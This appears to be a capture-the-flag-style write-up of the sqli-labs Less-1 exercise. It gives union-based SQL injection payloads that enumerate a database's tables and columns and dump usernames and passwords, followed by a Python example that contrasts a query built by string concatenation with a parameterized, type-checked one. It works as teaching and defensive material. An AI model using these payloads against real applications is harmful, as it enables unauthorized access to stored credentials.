1. Identify the injection point
Two conditions mainly need to be checked:
1. whether the parameter we pass in is under our control
2. whether the parameter we pass in reaches the database and is executed there
?id=1'
?id=1' and 1=1 --+
?id=1' and 1=2 --+
Try a single-quote injection; the page shows a database error message
http://192.168.183.150:8081/Less-1/?id=1%27
After closing the single quote, the page returns normally
http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=1%20--+
2. Query the columns
Determine the number of columns
?id=1' order by 3 --+
?id=1' order by 4 --+
Test for 3 columns: the page returns correctly, which means there are at least 3 columns
http://192.168.183.150:8081/Less-1/?id=1%27%20order%20by%203%20--+
Test for 4 columns: the returned page shows there is no 4th column, so there are exactly 3 columns in total
http://192.168.183.150:8081/Less-1/?id=1%27%20order%20by%204%20--+
Determine which column positions are displayed on the page
?id=1' and 1=2 union select 1,2,3 --+
http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=2%20union%20select%201,2,3%20--+
3. Get the current database
The first part of the query must return nothing (hence `and 1=2`) so that the rows from the union part are what gets displayed
?id=1' and 1=2 union select 1,database(),version() --+
http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=2%20union%20select%201,database(),user()%20--+
4. Get the table names of the database
?id=1' and 1=2 union select 1, (select group_concat(table_name) from information_schema.tables WHERE table_schema='security'), 3 --+
http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=2%20union%20select%201,%20(select%20group_concat(table_name)%20from%20information_schema.tables%20WHERE%20table_schema=%27security%27),%203%20--+
5. View the columns of the users table
?id=1' and 1=2 union select 1, (select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'), 3 --+
http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=2%20union%20select%201,%20(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20table_schema=%27security%27),3%20--+
6. View the contents of the columns in the table
?id=1' and 1=2 union select 1, (select group_concat(username) from users), (select group_concat(password) from users) --+
http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=2%20union%20select%201,%20(select%20group_concat(username)%20from%20users),%20(select%20group_concat(password)%20from%20users)%20--+
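The root cause of every step above is that the raw `?id=` value is concatenated into the SQL string. As an added example (not code from sqli-labs or this write-up), the following Python/SQLite snippet puts a lookup written in the Less-1 style next to a hardened version that validates the type and binds the value as a parameter; the table contents are constructed sample data, and the query shape `WHERE id='...' LIMIT 0,1` is assumed from the behaviour seen in the lab.

```python
import sqlite3

# Constructed stand-in for the lab's users table (sample data, not the real lab rows).
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")],
    )
    conn.commit()
    return conn

def lookup_vulnerable(conn, user_id):
    # Less-1 style: the request parameter is spliced straight into the SQL text,
    # so a quote in the value ends the string literal and the rest becomes SQL.
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 0,1"
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        # This is the "error message" the write-up observes after sending ?id=1'
        return ("error", str(exc))

def lookup_hardened(conn, user_id):
    # 1) validate the type: id is numeric, anything else is rejected outright;
    # 2) bind the value as a parameter so the driver never parses it as SQL.
    try:
        numeric_id = int(user_id)
    except (TypeError, ValueError):
        return None
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (numeric_id,)).fetchone()

def compare(conn, user_id):
    # Runs the same input through both lookups so the difference is visible.
    return {
        "vulnerable": lookup_vulnerable(conn, user_id),
        "hardened": lookup_hardened(conn, user_id),
    }

if __name__ == "__main__":
    db = setup_db()
    for value in ("1", "1'", "1' and 1=2 union select 1,2,3 --+"):
        print(repr(value), "->", compare(db, value))
```

With the union payload from step 2, the vulnerable lookup hands back the attacker-chosen row (1, 2, 3) while the hardened lookup returns nothing, because the value never parses as an integer.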